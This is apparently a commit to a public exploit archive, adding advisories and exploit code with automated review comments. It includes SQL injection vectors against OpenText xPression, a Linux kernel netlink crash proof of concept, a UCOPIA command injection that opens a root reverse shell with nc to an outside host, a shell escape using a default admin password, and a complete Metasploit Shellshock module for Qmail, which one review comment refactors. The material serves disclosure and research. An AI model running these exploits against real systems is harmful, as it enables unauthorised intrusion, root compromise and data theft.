diff --git a/files.csv b/files.csv
index 1c435b4d7..c82f7ff28 100644
--- a/files.csv
+++ b/files.csv
@@ -5690,6 +5690,13 @@ id,file,description,date,author,platform,type,port
42783,platforms/multiple/dos/42783.txt,"Adobe Flash - Out-of-Bounds Read in applyToRange",2017-09-25,"Google Security Research",multiple,dos,0
42917,platforms/windows/dos/42917.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)",2017-09-28,"Touhid M.Shaikh",windows,dos,0
42920,platforms/windows/dos/42920.py,"Trend Micro OfficeScan 11.0/XG (12.0) - Memory Corruption",2017-09-29,hyp3rlinx,windows,dos,0
+42932,platforms/linux/dos/42932.c,"Linux Kernel < 4.14.rc3 - Local Denial of Service",2017-10-02,"Wang Chenyu",linux,dos,0
+42941,platforms/multiple/dos/42941.py,"Dnsmasq < 2.78 - 2-byte Heap-Based Overflow",2017-10-02,"Google Security Research",multiple,dos,0
+42942,platforms/multiple/dos/42942.py,"Dnsmasq < 2.78 - Heap-Based Overflow",2017-10-02,"Google Security Research",multiple,dos,0
+42943,platforms/multiple/dos/42943.py,"Dnsmasq < 2.78 - Stack-Based Overflow",2017-10-02,"Google Security Research",multiple,dos,0
+42944,platforms/multiple/dos/42944.py,"Dnsmasq < 2.78 - Information Leak",2017-10-02,"Google Security Research",multiple,dos,0
+42945,platforms/multiple/dos/42945.py,"Dnsmasq < 2.78 - Lack of free() Denial of Service",2017-10-02,"Google Security Research",multiple,dos,0
+42946,platforms/multiple/dos/42946.py,"Dnsmasq < 2.78 - Integer Underflow",2017-10-02,"Google Security Research",multiple,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -9264,6 +9271,8 @@ id,file,description,date,author,platform,type,port
42890,platforms/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,windows,local,0
42918,platforms/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Buffer Overflow",2017-09-28,"Touhid M.Shaikh",windows,local,0
42921,platforms/windows/local/42921.py,"Dup Scout Enterprise 10.0.18 - 'Import Command' Buffer Overflow",2017-09-29,"Touhid M.Shaikh",windows,local,0
+42936,platforms/linux/local/42936.txt,"UCOPIA Wireless Appliance < 5.1.8 - Privilege Escalation",2017-10-02,Sysdream,linux,local,0
+42937,platforms/linux/local/42937.txt,"UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape",2017-10-02,Sysdream,linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15870,6 +15879,7 @@ id,file,description,date,author,platform,type,port
42806,platforms/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization",2017-09-27,SlidingWindow,java,remote,0
42888,platforms/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",hardware,remote,0
42928,platforms/windows/remote/42928.py,"Sync Breeze Enterprise 10.0.28 - Buffer Overflow",2017-09-30,"Owais Mehtab",windows,remote,0
+42938,platforms/linux/remote/42938.rb,"Qmail SMTP - Bash Environment Variable Injection (Metasploit)",2017-10-02,Metasploit,linux,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -38610,3 +38620,8 @@ id,file,description,date,author,platform,type,port
42926,platforms/php/webapps/42926.txt,"Real Estate MLM plan script 1.0 - 'srch' Parameter SQL Injection",2017-09-28,8bitsec,php,webapps,0
42927,platforms/php/webapps/42927.txt,"ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download",2017-09-29,"Ihsan Sencan",php,webapps,0
42931,platforms/hardware/webapps/42931.txt,"HBGK DVR 3.0.0 build20161206 - Authentication Bypass",2017-09-24,"RAT - ThiefKing",hardware,webapps,0
+42933,platforms/hardware/webapps/42933.txt,"NPM-V (Network Power Manager) 2.4.1 - Password Reset",2017-10-02,"Saeed reza Zamanian",hardware,webapps,0
+42934,platforms/php/webapps/42934.txt,"phpCollab 2.5.1 - Arbitrary File Upload",2017-10-02,Sysdream,php,webapps,0
+42935,platforms/php/webapps/42935.txt,"phpCollab 2.5.1 - SQL Injection",2017-10-02,Sysdream,php,webapps,0
+42939,platforms/jsp/webapps/42939.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection",2017-10-02,"Marcin Woloszyn",jsp,webapps,0
+42940,platforms/jsp/webapps/42940.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection",2017-10-02,"Marcin Woloszyn",jsp,webapps,0
diff --git a/platforms/hardware/webapps/42933.txt b/platforms/hardware/webapps/42933.txt
new file mode 100755
index 000000000..abdf91ddc
--- /dev/null
+++ b/platforms/hardware/webapps/42933.txt
@@ -0,0 +1,29 @@
+NPM-V(Network Power Manager) <= 2.4.1 Reset Password Vulnerability
+
+Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
+Product: NPM-V
+Affected Version : 2.4.1 and below
+Vendor : http://www.china-clever.com
+Product Link : http://www.china-clever.com/en/index.php/product?view=products&cid=125
+Date: 2017 Sep 25
+Manual: ftp://support.danbit.dk/N/NPOWER8IEC-E/NPM-V%20User%20Manual.pdf
+
+
+[*] NPM Introduction:
+ The NPM(Network Power Manager) is a network manageable device that provides power monitoring,
+ controlling and managements to many equipments in the rack cabinet of data center all over the world through
+ LAN or WAN. For meeting with the restrictions and requirements in different environment, NPM supplies many
+ connection methods that user can manage it through its Web interface(HTTP or HTTPS), Serial connection, Telnet
+ or SNMP
+[*] Vulnerability Details:
+ Based on security Check on this device , Authentication doesn't check on Device Admin Console
+ an attacker can access to management console pages directly and without authentication.
+ All files in these directories are directly accessible . /log/ /chart /device and /user .
+
+[*] PoC:
+ An Attacker can directly access to below page and Add User or View Password or Change Administrator credential without authentication.
+ if you browse this page you will see an html page likely the image exists on Page 13 (Figure 1-4) on Device Users Manual.
+ http://[Device IP]/user/user.html
+
+
+#EOF
\ No newline at end of file
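Review bot: The advisory ends after the PoC with no remediation or mitigation section, although the Vulnerability Details describe a management console served without any authentication check on the /log/, /chart, /device and /user paths; nothing states whether the vendor was contacted, whether fixed firmware exists, or what an operator can do meanwhile. A closing section such as `[*] Solution: <vendor fix status>; restrict the NPM web interface to a management network and review web logs for requests to /user/ and /device/ that carry no session` would give defenders something actionable. The index entry added to files.csv in this commit labels the issue "Password Reset", while the text describes an authentication bypass on the admin console; the two descriptions should agree.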
diff --git a/platforms/jsp/webapps/42939.txt b/platforms/jsp/webapps/42939.txt
new file mode 100755
index 000000000..a568b009b
--- /dev/null
+++ b/platforms/jsp/webapps/42939.txt
@@ -0,0 +1,62 @@
+Title: OpenText Document Sciences xPression (formerly EMC Document
+Sciences xPression) - SQL Injection
+Author: Marcin Woloszyn
+Date: 27. September 2017
+CVE: CVE-2017-14758
+
+Affected Software:
+==================
+OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)
+
+Exploit was tested on:
+======================
+v4.5SP1 Patch 13 (older versions might be affected as well)
+
+SQL Injection:
+==============
+
+Due to lack of prepared statements an application is prone to SQL
+Injection attacks.
+Potential attacker can retrieve data from application database by
+exploiting the issue.
+
+Vector :
+--------
+
+True: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=1
+False: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=2
+
+Additionally:
+
+http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153aaa
+
+Results in the following error in response:
+
+HTTP/1.1 200 OK
+[...]
+ Errors:
+
+ See nested exception; nested exception is:
+java.lang.RuntimeException:
+com.dsc.uniarch.cr.error.CRException: CRReportingSL: Method
+getJobRunsByIds did not succeed because of a database operation
+failure.;
+ ---> nested com.dsc.uniarch.cr.error.CRSyntaxException:
+Database syntax error :SELECT JOBRUN_ID, JOB_NAME,
+PUBLISH_PROFILE, PUBLISH_TYPE, START_TIME, END_TIME, HAS_DISTRIBUTION,
+DISTRIBUTION_NUMBER, STATUS, ERROR, REPORTING_LEVEL, THREAD_ID, JOB_ID
+FROM T_JOBRUN WHERE
+JOBRUN_ID=1502642747222443244706554841153aaa.;
+ ---> nested java.sql.SQLSyntaxErrorException:
+ORA-00933: SQL command not properly ended
+
+An attacker can see whole query and injection point. This can also be
+used for error-based data extraction.
+
+Fix:
+====
+https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774
+
+Contact:
+========
+mw[at]nme[dot]pl
\ No newline at end of file
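Review bot: The response excerpt from `Errors:` through `ORA-00933` shows the complete SQL statement and the Oracle error text echoed back in an HTTP 200 response, which is a second weakness, verbose error disclosure, separate from the missing prepared statements that the Fix section addresses with a single vendor link. A line under Fix such as `Defense in depth: return a generic error page instead of the raw exception text, so query structure is not exposed even if another injection point is found` would make that explicit for operators who cannot patch immediately. The "Date" header reads "27. September 2017" while the files.csv entry in this commit records 2017-10-02; if one is the discovery date and the other the publication date, the advisory should say so.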
diff --git a/platforms/jsp/webapps/42940.txt b/platforms/jsp/webapps/42940.txt
new file mode 100755
index 000000000..c7e1bdeae
--- /dev/null
+++ b/platforms/jsp/webapps/42940.txt
@@ -0,0 +1,37 @@
+Title: OpenText Document Sciences xPression (formerly EMC Document
+Sciences xPression) - SQL Injection
+Author: Marcin Woloszyn
+Date: 27. September 2017
+CVE: CVE-2017-14757
+
+Affected Software:
+==================
+OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)
+
+Exploit was tested on:
+======================
+v4.5SP1 Patch 13 (older versions might be affected as well)
+
+SQL Injection:
+==============
+
+Due to lack of prepared statements an application is prone to SQL
+Injection attacks.
+Potential attacker can retrieve data from application database by
+exploiting the issue.
+
+Vector :
+--------
+
+https://[...]/xAdmin/html/cm_doclist_view_uc.jsp?cat_id=503&documentId=185365177756%20and%201=1&documentType=xDesignPublish&documentName=ContractRealEstate
+
+ ^
+Results can be retrieved using blind SQL injection method.
+
+Fix:
+====
+https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774
+
+Contact:
+========
+mw[at]nme[dot]pl
\ No newline at end of file
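Review bot: The Title on the first two lines is identical to the one in 42939.txt committed alongside it, and neither names the vulnerable endpoint or parameter, so the two advisories cannot be told apart by title; the files.csv entries disambiguate with "jobRunId" and "documentId", and the advisory headers should too, e.g. `Title: OpenText Document Sciences xPression - SQL Injection in cm_doclist_view_uc.jsp documentId parameter (CVE-2017-14757)`. The lone `^` marker under the Vector URL appears to have lost its horizontal alignment in transit, so it no longer indicates which part of the query string it was meant to point at; naming the parameter in prose would not depend on whitespace surviving.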
diff --git a/platforms/linux/dos/42932.c b/platforms/linux/dos/42932.c
new file mode 100755
index 000000000..8b55e6e35
--- /dev/null
+++ b/platforms/linux/dos/42932.c
@@ -0,0 +1,145 @@
+# Exploit Title: Linux Kernel<4.14.rc3 Local Denial of Service
+# Date: 2017-Oct-02
+# Exploit Author: Wang Chenyu (Nanyang Technological University)
+# Version:Linux kernel 4-14-rc1
+# Tested on:Ubuntu 16.04 desktop amd64
+# CVE : CVE-2017-14489
+# CVE description: This CVE is assigned to Wang Chunyu (Red Hat) and
+discovered by Syzkaller. Provided for legal security research and testing
+purposes ONLY.
+In this POC, skb_shinfo(SKB)->nr_frags was overwritten by ev->iferror = err
+(0xff) in the condition where nlh->nlmsg_len==0x10 and skb->len >
+nlh->nlmsg_len.
+
+
+POC:
+#include
+#include
+#include
+#include
+#include
+
+#define NETLINK_USER 31
+
+#define MAX_PAYLOAD 1024 /* maximum payload size*/
+struct sockaddr_nl src_addr, dest_addr;
+struct nlmsghdr *nlh = NULL;
+struct iovec iov;
+int sock_fd;
+struct msghdr msg;
+
+int main()
+{
+sock_fd=socket(PF_NETLINK, SOCK_RAW, NETLINK_ISCSI);
+if(sock_fd<0)
+return -1;
+
+memset(&src_addr, 0, sizeof(src_addr));
+src_addr.nl_family = AF_NETLINK;
+src_addr.nl_pid = getpid(); /* self pid */
+
+bind(sock_fd, (struct sockaddr*)&src_addr, sizeof(src_addr));
+
+memset(&dest_addr, 0, sizeof(dest_addr));
+memset(&dest_addr, 0, sizeof(dest_addr));
+dest_addr.nl_family = AF_NETLINK;
+dest_addr.nl_pid = 0; /* For Linux Kernel */
+dest_addr.nl_groups = 0; /* unicast */
+
+nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));
+memset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));
+nlh->nlmsg_len = 0xac;
+nlh->nlmsg_pid = getpid();
+nlh->nlmsg_flags = 0;
+
+strcpy(NLMSG_DATA(nlh), "ABCDEFGHabcdefghABCDEFGHabcdef
+ghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHab
+cdefghAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDD\x10");
+
+iov.iov_base = (void *)nlh;
+iov.iov_len = 0xc0;
+msg.msg_name = (void *)&dest_addr;
+msg.msg_namelen = sizeof(dest_addr);
+msg.msg_iov = &iov;
+msg.msg_iovlen = 1;
+
+printf("Sending message to kernel\n");
+sendmsg(sock_fd,&msg,0);
+printf("Waiting for message from kernel\n");
+
+/* Read message from kernel */
+recvmsg(sock_fd, &msg, 0);
+printf("Received message payload: %s\n", (char *)NLMSG_DATA(nlh));
+close(sock_fd);
+}
+
+
+Crash info:
+[ 17.880629] BUG: unable to handle kernel NULL pointer dereference at
+0000000000000028
+[ 17.881586] IP: skb_release_data+0x77/0x110
+[ 17.882093] PGD 7b02a067 P4D 7b02a067 PUD 7b02b067 PMD 0
+[ 17.882743] Oops: 0002 [#1] SMP
+[ 17.883123] Modules linked in:
+[ 17.883493] CPU: 1 PID: 2687 Comm: test02 Not tainted 4.14.0-rc1+ #1
+[ 17.884251] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
+Ubuntu-1.8.2-1ubuntu1 04/01/2014
+[ 17.885350] task: ffff88007c5a1900 task.stack: ffffc90000e10000
+[ 17.886058] RIP: 0010:skb_release_data+0x77/0x110
+[ 17.886590] RSP: 0018:ffffc90000e13c08 EFLAGS: 00010202
+[ 17.887213] RAX: 000000000000000d RBX: ffff88007bd50300 RCX:
+ffffffff820f96a0
+[ 17.888059] RDX: 000000000000000c RSI: 0000000000000010 RDI:
+000000000000000c
+[ 17.888893] RBP: ffffc90000e13c20 R08: ffffffff820f9860 R09:
+ffffc90000e13ad8
+[ 17.889712] R10: ffffea0001ef5400 R11: ffff88007d001700 R12:
+0000000000000000
+[ 17.890349] R13: ffff88007be710c0 R14: 00000000000000c0 R15:
+0000000000000000
+[ 17.890977] FS: 00007f7614d4c700(0000) GS:ffff88007fd00000(0000)
+knlGS:0000000000000000
+[ 17.891592] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[ 17.892054] CR2: 0000000000000028 CR3: 000000007b022000 CR4:
+00000000000006e0
+[ 17.892629] Call Trace:
+[ 17.892833] skb_release_all+0x1f/0x30
+[ 17.893140] consume_skb+0x27/0x90
+[ 17.893418] netlink_unicast+0x16a/0x210
+[ 17.893735] netlink_sendmsg+0x2a3/0x390
+[ 17.894050] sock_sendmsg+0x33/0x40
+[ 17.894336] ___sys_sendmsg+0x29e/0x2b0
+[ 17.894650] ? __wake_up_common_lock+0x7a/0x90
+[ 17.895009] ? __wake_up+0xe/0x10
+[ 17.895280] ? tty_write_unlock+0x2c/0x30
+[ 17.895606] ? tty_ldisc_deref+0x11/0x20
+[ 17.895925] ? n_tty_open+0xd0/0xd0
+[ 17.896211] ? __vfs_write+0x23/0x130
+[ 17.896512] __sys_sendmsg+0x40/0x70
+[ 17.896805] ? __sys_sendmsg+0x40/0x70
+[ 17.897133] SyS_sendmsg+0xd/0x20
+[ 17.897408] entry_SYSCALL_64_fastpath+0x13/0x94
+[ 17.897783] RIP: 0033:0x7f7614886320
+[ 17.898186] RSP: 002b:00007fff6f17f9c8 EFLAGS: 00000246 ORIG_RAX:
+000000000000002e
+[ 17.898793] RAX: ffffffffffffffda RBX: 00007f7614b2e7a0 RCX:
+00007f7614886320
+[ 17.899368] RDX: 0000000000000000 RSI: 0000000000600fc0 RDI:
+0000000000000003
+[ 17.899943] RBP: 0000000000000053 R08: 00000000ffffffff R09:
+0000000000000000
+[ 17.900521] R10: 0000000000000000 R11: 0000000000000246 R12:
+0000000000400b9e
+[ 17.901095] R13: 00007f7614d50000 R14: 0000000000000019 R15:
+0000000000400b9e
+[ 17.901672] Code: 45 31 e4 41 80 7d 02 00 48 89 fb 74 32 49 63 c4 48 83
+c0 03 48 c1 e0 04 49 8b 7c 05 00 48 8b 47 20 48 8d 50 ff a8 01 48 0f 45 fa
+ ff 4f 1c 74 7a 41 0f b6 45 02 41 83 c4 01 44 39 e0 7f ce 49
+[ 17.903190] RIP: skb_release_data+0x77/0x110 RSP: ffffc90000e13c08
+[ 17.903689] CR2: 0000000000000028
+[ 17.903980] ---[ end trace 2f1926fbc1d32679 ]---
+
+
+Reference:
+[1] https://patchwork.kernel.org/patch/9923803/
+[2] https://github.com/google/syzkaller
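Review bot: The five `#include` lines directly under `POC:` have lost their header names and the `strcpy` string literal is split across three physical lines, so the file as archived is not valid C; this looks like mail-client stripping of angle brackets and wrapping of long lines rather than intent, and a header comment such as `# Note: include directives and the long string literal were mangled in transit; see reference [1] for the kernel fix` would save the next reader from debugging the wrong thing. `#define NETLINK_USER 31` is never used, since the socket is opened with `NETLINK_ISCSI`, and `memset(&dest_addr, 0, sizeof(dest_addr));` appears twice in a row. The return values of `malloc`, `bind` and `recvmsg` are unchecked, so a failed allocation dereferences NULL in user space before anything reaches the kernel. The CVE description line credits "Wang Chunyu (Red Hat)" while the author line reads "Wang Chenyu", which the index should reconcile.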
diff --git a/platforms/linux/local/42936.txt b/platforms/linux/local/42936.txt
new file mode 100755
index 000000000..88c3f157e
--- /dev/null
+++ b/platforms/linux/local/42936.txt
@@ -0,0 +1,79 @@
+# [CVE-2017-11322] UCOPIA Wireless Appliance < 5.1.8 Privileges Escalation
+
+## Asset description
+
+UCOPIA solutions bring together a combination of software, appliance and cloud services serving small to large customers.
+
+More than 12,000 UCOPIA solutions are deployed and maintained by UCOPIA expert partners all over the world.
+
+The affected asset in this report is a WiFi management appliance.
+
+## Vulnerability
+
+CHROOT escape and privileges escalation.
+
+**Threat**
+
+Improper sanitization of system commands in the chroothole_client executable in UCOPIA Wireless Appliance, prior to 5.1.8, allows local attackers to elevate privileges to root user and escape from the *chroot*.
+
+**CVE ID**: CVE-2017-11322
+
+**Access Vector**: local
+
+**Security Risk**: high
+
+**Vulnerability**: CWE-78
+
+**CVSS Base Score**: 8.2 (High)
+
+**CVSS Vector**: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
+
+### Proof of Concept: chroot escape / privileges escalation
+
+The **chroothole_client** binary is used by the appliance to run programs outside the *chroot*, as the **root** user.
+
+Because of an improper sanitization of system commands, we managed to gain a complete **root** access to the appliance, outside the *chroot*.
+
+```
+$ chroothole_client '/usr/sbin/status'
+is not running ... failed !
+$ chroothole_client '/usr/sbin/status $(which nc)'
+/bin/nc is not running ... failed!
+$ chroothole_client '/usr/sbin/status $(nc 10.0.0.125 4444 -e /bin/sh)'
+```
+
+Attacker terminal :
+
+```
+$ ncat -lvp 4444
+Ncat: Listening on 0.0.0.0:4444
+Ncat: Connection from 10.0.0.1:49156.
+whoami
+root
+```
+
+## Solution
+
+Update to UCOPIA 5.1.8
+
+## Timeline (dd/mm/yyyy)
+
+* 08/03/2017 : Vulnerability discovery.
+* 03/05/2017 : Initial contact.
+* 10/05/2017 : GPG Key exchange.
+* 10/05/2017 : Advisory sent to vendor.
+* 17/05/2017 : Request for feedback.
+* 22/05/2017 : Vendor acknowledge the vulnerabilities.
+* 21/06/2017 : Sysdream Labs request for an ETA, warning for public disclosure.
+* 21/06/2017 : Vendor say that the UCOPIA 5.1.8 fixes the issue.
+* 29/09/2017 : Public disclosure.
+
+## Credits
+
+* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
+
+--
+SYSDREAM Labs
+GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
+* Website: https://sysdream.com/
+* Twitter: @sysdream
\ No newline at end of file
diff --git a/platforms/linux/local/42937.txt b/platforms/linux/local/42937.txt
new file mode 100755
index 000000000..828ad50c7
--- /dev/null
+++ b/platforms/linux/local/42937.txt
@@ -0,0 +1,90 @@
+# [CVE-2017-11321] UCOPIA Wireless Appliance < 5.1.8 Restricted Shell Escape
+
+## Asset Description
+
+UCOPIA solutions bring together a combination of software, appliance and cloud services serving small to large customers.
+
+More than 12,000 UCOPIA solutions are deployed and maintained by UCOPIA expert partners all over the world.
+
+The affected asset in this report is a WiFi management appliance.
+
+
+## Vulnerability
+
+Shell Escape via `less` command.
+
+**Threat**
+
+Improper sanitization of system commands in the restricted shell interface in UCOPIA Wireless Appliance, prior to 5.1.8, allows remote attackers to gain access to a system shell as the "admin" user.
+
+**CVE ID**: CVE-2017-11321
+
+**Access Vector**: network
+
+**Security Risk**: critical
+
+**Vulnerability**: CWE-78
+
+**CVSS Base Score**: 9.1 (Critical)
+
+**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
+
+### Proof of Concept: Restricted Shell Escape
+
+By default, the UCOPIA wireless appliances exposes two shell access on port 22 (SSH) and 222 (ShellInTheBox).
+
+A documented **admin** user exists on the system with the password **bhu85tgb**.
+
+Quoted from the documentation :
+
+> You can also retrieve the IP address of the outgoing interface. For this, you need to log in to the terminal of the virtual machine with
+the following username and password: admin/bhu85tgb, and then execute the interface command.
+
+By logging in within these interfaces, we can access to a restricted shell (*clish*) that allows only a few commands.
+
+However, the `less` command is allowed, and because `less` allows to execute shell commands when viewing a file, we can use it to escape the restricted shell.
+
+Steps :
+
+**1/** Login to the appliance using SSH or ShellInTheBox.
+
+**2/** Run the `less /etc/passwd` command.
+
+**3/** When viewing the file, type `!sh`
+
+**4/** You now have unrestricted `admin` user access to the appliance.
+
+```
+> less /etc/passwd
+!sh
+$ ls /
+bin dev etc home lib proc tmp user
+$ whoami
+admin
+```
+
+## Solution
+
+Update to UCOPIA 5.1.8
+
+## Timeline (dd/mm/yyyy)
+
+* 08/03/2017 : Vulnerability discovery.
+* 03/05/2017 : Initial contact.
+* 10/05/2017 : GPG Key exchange.
+* 10/05/2017 : Advisory sent to vendor.
+* 17/05/2017 : Request for feedback.
+* 22/05/2017 : Vendor acknowledge the vulnerabilities.
+* 21/06/2017 : Sysdream Labs request for an ETA, warning for public disclosure.
+* 21/06/2017 : Vendor say that the UCOPIA 5.1.8 fixes the issue.
+* 29/09/2017 : Public disclosure.
+
+## Credits
+
+* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
+
+--
+SYSDREAM Labs
+GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
+* Website: https://sysdream.com/
+* Twitter: @sysdream
\ No newline at end of file
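Review bot: The Solution section says only "Update to UCOPIA 5.1.8", but the proof of concept rests on two conditions the upgrade advice does not address: a documented default credential (admin/bhu85tgb, quoted from the vendor manual) and shell access exposed on ports 22 and 222. Nothing states whether 5.1.8 changes either, so a defender cannot tell from this text whether rotating the admin password and restricting those ports is still required after upgrading; a sentence such as `Mitigation: change the default admin password and restrict SSH (22) and ShellInTheBox (222) to a management network` would close that gap. Since the escape itself is the `!` command in `less`, noting that `less` honours `LESSSECURE=1` to disable shell escapes would also help operators hardening any restricted shell built on it.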
diff --git a/platforms/linux/remote/42938.rb b/platforms/linux/remote/42938.rb
new file mode 100755
index 000000000..4c2dedfbb
--- /dev/null
+++ b/platforms/linux/remote/42938.rb
@@ -0,0 +1,109 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::Smtp
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Qmail SMTP Bash Environment Variable Injection (Shellshock)',
+ 'Description' => %q{
+ This module exploits a shellshock vulnerability on Qmail, a public
+ domain MTA written in C that runs on Unix systems.
+ Due to the lack of validation on the MAIL FROM field, it is possible to
+ execute shell code on a system with a vulnerable BASH (Shellshock).
+ This flaw works on the latest Qmail versions (qmail-1.03 and
+ netqmail-1.06).
+ However, in order to execute code, /bin/sh has to be linked to bash
+ (usually default configuration) and a valid recipient must be set on the
+ RCPT TO field (usually admin@exampledomain.com).
+ The exploit does not work on the "qmailrocks" community version
+ as it ensures the MAILFROM field is well-formed.
+ },
+ 'Author' =>
+ [
+ 'Mario Ledo (Metasploit module)',
+ 'Gabriel Follon (Metasploit module)',
+ 'Kyle George (Vulnerability discovery)'
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => ['unix'],
+ 'Arch' => ARCH_CMD,
+ 'References' =>
+ [
+ ['CVE', '2014-6271'],
+ ['CWE', '94'],
+ ['OSVDB', '112004'],
+ ['EDB', '34765'],
+ ['URL', 'http://seclists.org/oss-sec/2014/q3/649'],
+ ['URL', 'https://lists.gt.net/qmail/users/138578']
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => "\x3e",
+ 'Space' => 888,
+ 'DisableNops' => true,
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'generic telnet perl ruby python'
+ # telnet ruby python and perl works only if installed on target
+ }
+ },
+ 'Targets' => [ [ 'Automatic', { }] ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Sep 24 2014'
+ ))
+
+ deregister_options('MAILFROM')
+ end
+
+ def smtp_send(data = nil)
+ begin
+ result = ''
+ code = 0
+ sock.put("#{data}")
+ result = sock.get_once
+ result.chomp! if (result)
+ code = result[0..2].to_i if result
+ return result, code
+ rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError
+ return result, 0
+ rescue ::Exception => e
+ print_error("#{rhost}:#{rport} Error smtp_send: '#{e.class}' '#{e}'")
+ return nil, 0
+ end
+ end
+
+ def exploit
+ to = datastore['MAILTO']
+ connect
+ result = smtp_send("HELO localhost\r\n")
+ if result[1] < 200 || result[1] > 300
+ fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
+ end
+ print_status('Sending the payload...')
+ result = smtp_send("mail from:<() { :; }; " + payload.encoded.gsub!(/\\/, '\\\\\\\\') + ">\r\n")
+ if result[1] < 200 || result[1] > 300
+ fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
+ end
+ print_status("Sending RCPT TO #{to}")
+ result = smtp_send("rcpt to:<#{to}>\r\n")
+ if result[1] < 200 || result[1] > 300
+ fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
+ end
+ result = smtp_send("data\r\n")
+ if result[1] < 200 || result[1] > 354
+ fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
+ end
+ result = smtp_send("data\r\n\r\nfoo\r\n\r\n.\r\n")
+ if result[1] < 200 || result[1] > 300
+ fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
+ end
+ disconnect
+ end
+end
\ No newline at end of file
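Review bot: The reply check `if result[1] < 200 || result[1] > 300` followed by `fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))` is repeated five times in `exploit`, differing only in the 354 ceiling accepted for the DATA step, which is a style point worth a small helper so the accepted range and the zero-code meaning are stated once. In `smtp_send`, `rescue ::Exception => e` also swallows `Interrupt` and `NoMemoryError`, which modules normally leave to the framework; `rescue ::StandardError => e` is the conventional form. With a helper that takes the result pair and the accepted ceiling, `exploit` shrinks to the protocol exchange itself.
```ruby
  # Raise Failure::Unknown when the SMTP reply code is outside [200, max_code].
  # A code of 0 means smtp_send saw no reply, so report a connection error instead.
  def check_smtp_reply(result, max_code = 300)
    return if result[1] >= 200 && result[1] <= max_code
    fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
  end

  def exploit
    to = datastore['MAILTO']
    connect
    check_smtp_reply(smtp_send("HELO localhost\r\n"))
    # … unchanged: MAIL FROM and RCPT TO steps, each followed by check_smtp_reply …
    check_smtp_reply(smtp_send("data\r\n"), 354)
    # … unchanged: message body step and disconnect …
  end
```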
